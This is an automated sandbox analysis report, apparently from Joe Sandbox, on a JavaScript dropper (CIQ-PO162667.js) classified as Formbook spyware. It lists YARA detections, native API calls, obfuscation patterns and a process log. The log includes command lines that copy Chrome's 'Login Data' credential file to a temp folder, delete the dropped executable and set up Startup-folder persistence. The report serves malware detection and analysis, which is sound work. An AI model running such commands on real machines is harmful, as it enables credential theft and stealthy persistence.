Source: 00000000.00000003.284462821.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.284462821.000001E33FAAE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.806579092.0000000000D64000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.273684731.000001E33FAEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.273404024.000001E33FAEE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000028.00000000.781223568.0000000000C51000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.298399545.000001E34090B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: wscript.exe PID: 6352, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B1030 2_2_000B1030
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CEA25 2_2_000CEA25
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B9280 2_2_000B9280
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000BDC20 2_2_000BDC20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B2D90 2_2_000B2D90
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CE78A 2_2_000CE78A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD792 2_2_000CD792
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B2FB0 2_2_000B2FB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_017FF900 2_2_017FF900
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01814120 2_2_01814120
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0180B090 2_2_0180B090
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018220A0 2_2_018220A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C20A8 2_2_018C20A8
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C28EC 2_2_018C28EC
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018B1002 2_2_018B1002
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0182EBB0 2_2_0182EBB0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018BDBD2 2_2_018BDBD2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C2B28 2_2_018C2B28
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018C22AE 2_2_018C22AE
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F0B090 18_2_04F0B090
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FB1002 18_2_04FB1002
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04FC1D55 18_2_04FC1D55
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EF0D20 18_2_04EF0D20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F14120 18_2_04F14120
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04EFF900 18_2_04EFF900
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F16E30 18_2_04F16E30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F2EBB0 18_2_04F2EBB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032EDC20 18_2_032EDC20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FEA25 18_2_032FEA25
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E9280 18_2_032E9280
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E2FB0 18_2_032E2FB0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FE78A 18_2_032FE78A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FD792 18_2_032FD792
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E2D90 18_2_032E2D90
Contains functionality to call native functions
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA320 NtCreateFile, 2_2_000CA320
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA3D0 NtReadFile, 2_2_000CA3D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA450 NtClose, 2_2_000CA450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA500 NtAllocateVirtualMemory, 2_2_000CA500
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA31A NtCreateFile, 2_2_000CA31A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA3CA NtReadFile, 2_2_000CA3CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CA4FA NtAllocateVirtualMemory, 2_2_000CA4FA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018399A0 NtCreateSection,LdrInitializeThunk, 2_2_018399A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839910 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_01839910
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018398F0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_018398F0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839840 NtDelayExecution,LdrInitializeThunk, 2_2_01839840
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839860 NtQuerySystemInformation,LdrInitializeThunk, 2_2_01839860
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A00 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_01839A00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A20 NtResumeThread,LdrInitializeThunk, 2_2_01839A20
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A50 NtCreateFile,LdrInitializeThunk, 2_2_01839A50
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018395D0 NtClose,LdrInitializeThunk, 2_2_018395D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839540 NtReadFile,LdrInitializeThunk, 2_2_01839540
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839780 NtMapViewOfSection,LdrInitializeThunk, 2_2_01839780
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018397A0 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_018397A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839FE0 NtCreateMutant,LdrInitializeThunk, 2_2_01839FE0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839710 NtQueryInformationToken,LdrInitializeThunk, 2_2_01839710
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018396E0 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_018396E0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839660 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_01839660
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018399D0 NtCreateProcessEx, 2_2_018399D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839950 NtQueueApcThread, 2_2_01839950
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_018398A0 NtWriteVirtualMemory, 2_2_018398A0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839820 NtEnumerateKey, 2_2_01839820
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0183B040 NtSuspendThread, 2_2_0183B040
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0183A3B0 NtGetContextThread, 2_2_0183A3B0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839B00 NtSetValueKey, 2_2_01839B00
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_01839A80 NtOpenDirectoryObject, 2_2_01839A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_04F39860
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39840 NtDelayExecution,LdrInitializeThunk, 18_2_04F39840
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F395D0 NtClose,LdrInitializeThunk, 18_2_04F395D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F399A0 NtCreateSection,LdrInitializeThunk, 18_2_04F399A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39540 NtReadFile,LdrInitializeThunk, 18_2_04F39540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_04F39910
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F396E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_04F396E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F396D0 NtCreateKey,LdrInitializeThunk, 18_2_04F396D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39660 NtAllocateVirtualMemory,LdrInitializeThunk, 18_2_04F39660
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A50 NtCreateFile,LdrInitializeThunk, 18_2_04F39A50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39650 NtQueryValueKey,LdrInitializeThunk, 18_2_04F39650
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39610 NtEnumerateValueKey,LdrInitializeThunk, 18_2_04F39610
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39FE0 NtCreateMutant,LdrInitializeThunk, 18_2_04F39FE0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39780 NtMapViewOfSection,LdrInitializeThunk, 18_2_04F39780
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39710 NtQueryInformationToken,LdrInitializeThunk, 18_2_04F39710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39B00 NtSetValueKey,LdrInitializeThunk, 18_2_04F39B00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F398F0 NtReadVirtualMemory, 18_2_04F398F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F398A0 NtWriteVirtualMemory, 18_2_04F398A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3B040 NtSuspendThread, 18_2_04F3B040
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39820 NtEnumerateKey, 18_2_04F39820
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F395F0 NtQueryInformationFile, 18_2_04F395F0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F399D0 NtCreateProcessEx, 18_2_04F399D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39560 NtWriteFile, 18_2_04F39560
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39950 NtQueueApcThread, 18_2_04F39950
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3AD30 NtSetContextThread, 18_2_04F3AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39520 NtWaitForSingleObject, 18_2_04F39520
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A80 NtOpenDirectoryObject, 18_2_04F39A80
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39670 NtQueryInformationProcess, 18_2_04F39670
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A20 NtResumeThread, 18_2_04F39A20
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A10 NtQuerySection, 18_2_04F39A10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39A00 NtProtectVirtualMemory, 18_2_04F39A00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3A3B0 NtGetContextThread, 18_2_04F3A3B0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F397A0 NtUnmapViewOfSection, 18_2_04F397A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39770 NtSetInformationFile, 18_2_04F39770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3A770 NtOpenThread, 18_2_04F3A770
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39760 NtOpenProcess, 18_2_04F39760
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F39730 NtQueryVirtualMemory, 18_2_04F39730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F3A710 NtOpenProcessToken, 18_2_04F3A710
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA320 NtCreateFile, 18_2_032FA320
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA3D0 NtReadFile, 18_2_032FA3D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA500 NtAllocateVirtualMemory, 18_2_032FA500
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA450 NtClose, 18_2_032FA450
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA31A NtCreateFile, 18_2_032FA31A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA3CA NtReadFile, 18_2_032FA3CA
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FA4FA NtAllocateVirtualMemory, 18_2_032FA4FA
PE file does not import any functions
Source: 5hol_r7nkdhp.exe.4.dr Static PE information: No import functions for PE file found
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Java / VBScript file with very long strings (likely obfuscated code)
Source: CIQ-PO162667.js Initial sample: Strings found which are bigger than 50
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Cex8di\5hol_r7nkdhp.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\bin.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5hol_r7nkdhp.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5hol_r7nkdhp.exe.4.dr Static PE information: Section .text
Source: bin.exe.0.dr Static PE information: Section .text
Source: CIQ-PO162667.js Virustotal: Detection: 25%
Source: CIQ-PO162667.js ReversingLabs: Detection: 21%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO162667.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\cmmon32.exe C:\Windows\SysWOW64\cmmon32.exe
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\JmtwmJXhXe.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmtwmJXhXe.js" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe C:\Program Files (x86)\Cex8di\5hol_r7nkdhp.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\JmtwmJXhXe.js Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.expl.evad.winJS@19/5@41/14
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3128:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4744:120:WilError_01
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\wscript.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\explorer.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\Outlook\Capabilities Jump to behavior
Source: Binary string: cmmon32.pdb source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: cmmon32.pdbGCTL source: bin.exe, 00000002.00000002.444497879.0000000003790000.00000040.10000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: bin.exe, 00000002.00000003.287029709.000000000163B000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.283814480.000000000149D000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441378335.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441685215.00000000018EF000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.441045489.0000000004D33000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808288523.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.439635853.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808473944.0000000004FEF000.00000040.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.781887430.0000000001100000.00000004.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.783460088.0000000001290000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: bin.exe, bin.exe, 00000002.00000003.287029709.000000000163B000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000003.283814480.000000000149D000.00000004.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441378335.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, bin.exe, 00000002.00000002.441685215.00000000018EF000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, cmmon32.exe, 00000012.00000003.441045489.0000000004D33000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808288523.0000000004ED0000.00000040.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000003.439635853.0000000004B96000.00000004.00000800.00020000.00000000.sdmp, cmmon32.exe, 00000012.00000002.808473944.0000000004FEF000.00000040.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.781887430.0000000001100000.00000004.00000800.00020000.00000000.sdmp, 5hol_r7nkdhp.exe, 00000028.00000003.783460088.0000000001290000.00000004.00000800.00020000.00000000.sdmp
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000BC928 push cs; retf 2_2_000BC935
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000B492D push eax; ret 2_2_000B492E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000C72B3 push eax; retf 2_2_000C72B4
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CEB3B push dword ptr [7D52CE57h]; ret 2_2_000CEB5E
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD625 push eax; ret 2_2_000CD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD67B push eax; ret 2_2_000CD6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD672 push eax; ret 2_2_000CD678
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_000CD6DC push eax; ret 2_2_000CD6E2
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_0184D0D1 push ecx; ret 2_2_0184D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_04F4D0D1 push ecx; ret 18_2_04F4D0E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032FEB3B push dword ptr [7D52CE57h]; ret 18_2_032FEB5E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032F72B3 push eax; retf 18_2_032F72B4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032E492D push eax; ret 18_2_032E492E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 18_2_032EC928 push cs; retf 18_2_032EC935
